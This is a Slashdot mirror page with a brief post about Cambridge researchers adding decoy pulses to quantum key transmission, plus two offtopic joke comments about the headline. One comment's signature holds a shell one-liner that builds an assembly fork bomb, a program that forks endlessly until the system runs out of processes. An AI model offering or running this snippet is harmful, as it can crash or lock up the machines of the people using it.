Slashdot Mirror


Scientists Make Quantum Encryption Breakthrough

Madas writes "Scientists working in Cambridge have managed to make quantum encryption completely secure (registration required) by putting decoy pulses in the key transmission stream. According to the story this paves the way for safe, encrypted high-speed data links. Could this allow completely private transmission of data away from snooping eyes and ears? Or will it mean film studios can stop movies from being copied when traveling on the internet?"

2 of 156 comments (clear)

  1. Re:Tag suggestion... by Anonymous Coward · · Score: -1, Offtopic

    proofyourfuckingheadlines

    The sad part is... he did.

  2. Re:Tag suggestion... by Hal_Porter · · Score: -1, Offtopic

    proofreadyourfuckingheadlines

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;